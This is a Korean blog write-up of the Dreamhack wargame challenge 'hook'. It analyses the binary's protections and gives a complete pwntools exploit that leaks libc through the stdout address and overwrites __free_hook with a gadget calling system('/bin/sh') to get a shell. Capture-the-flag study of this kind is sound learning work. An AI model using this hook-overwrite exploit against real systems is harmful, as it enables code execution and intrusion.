hook

---

hook

문제 풀이

이번에도 hook overwirte의 문제로 이전 문제에서 봤던 형식과는 약간 다르네요
아무래도 one_gadget처럼은 못하는 듯 싶네요 PIE가 존재하지 않고 RELRO가 FULL..
상당히 힘들겠네요 PIE가 적용 X인것을 봤을 때 code 영역에서 주소를 활용할 듯?

근데 one_gadget으로 해도 될 거 같긴한데 이름에 따라서 해봅시다

log의 타입의 포인터 하나와 size_t 타입의 변수 선언이 되어있습니다.
그리고 stdout.. 주소를 출력하는데 밑에 ptr이 더블포인터인점을 미루어보았을 땐.. 

위에 봤던 더블포인터 ptr부분에서 배열으로 적용되므로
ptr[0]에 들어간 값을 참조하는 값에 ptr[1]을 대입한 모습인 것 같습니다
즉, **ptr = ptr[1]인 느낌? 참고로 *(long *)*ptr.. 형변환 코드네요 근데.. 굳이? 
결론적으로 **ptr = ptr[1] 맞네요

생각해보니까 PIE가 적용이 안되어 있으므로 바로 gadget을 사용해도 될거 같긴한데..
입력 받은 사이즈 만큼 heap의 메모리 할당 그 주소는 ptr로 적용됩니다
방금 할당한 주소에 size 만큼 입력받고 있는 모습입니다

---

Exploit 설계

처음 출력해주는 stdout의 주소를 받아 libc_base를 구해 __free_hook의 주소를 구한 후
구한 주소에 __free_hook주소와 system("/bin/sh")의 주소를 연달아 입력하면 끝날 듯 싶은데..

위에 봤던 더블포인터 ptr부분에서 배열으로 적용되므로
ptr[0] = free_hook 변수, ptr[1]이 넣어줄 값으로 적용하면 될 거 같습니다.

그러기에 한 번 시도를 해봅시다

 

---

Exploit

이전 코드를 많이 참고하여 작성하였습니다

from pwn import *
 
def slog(a, b):
    return success(": ".join([a, hex(b)]))
 
p = remote("host3.dreamhack.games", 19300)
e = ELF("./hook")
libc = ELF("./libc.so.6")
 
stdout_offset = libc.symbols["_IO_2_1_stdout_"]
free_hook_offset = libc.symbols["__free_hook"]
system_address = 0x400a11
 
p.recvuntil("stdout: ")
stdout_address = int(p.recv(14), 16)
libc_base = stdout_address - stdout_offset
free_hook_address = libc_base + free_hook_offset
 
slog("library base", libc_base)
slog("free_hook address", free_hook_address)
slog("system address", system_address)
 
p.sendlineafter("Size: ", str(400))
payload = p64(free_hook_address) + p64(system_address)
p.sendafter("Data: ", payload)
 
p.interactive()

free_hook 이 자동할당을 후킹하는 모습 처음 hook 문제를 풀었을 때 고전했던 부분인데
이렇게 보니까 참.. 별거 없어보일지도? Dreamhack 에서 함께하기 자료를 많이 참고 하였습니다

---

참고 자료

 

참고 이미지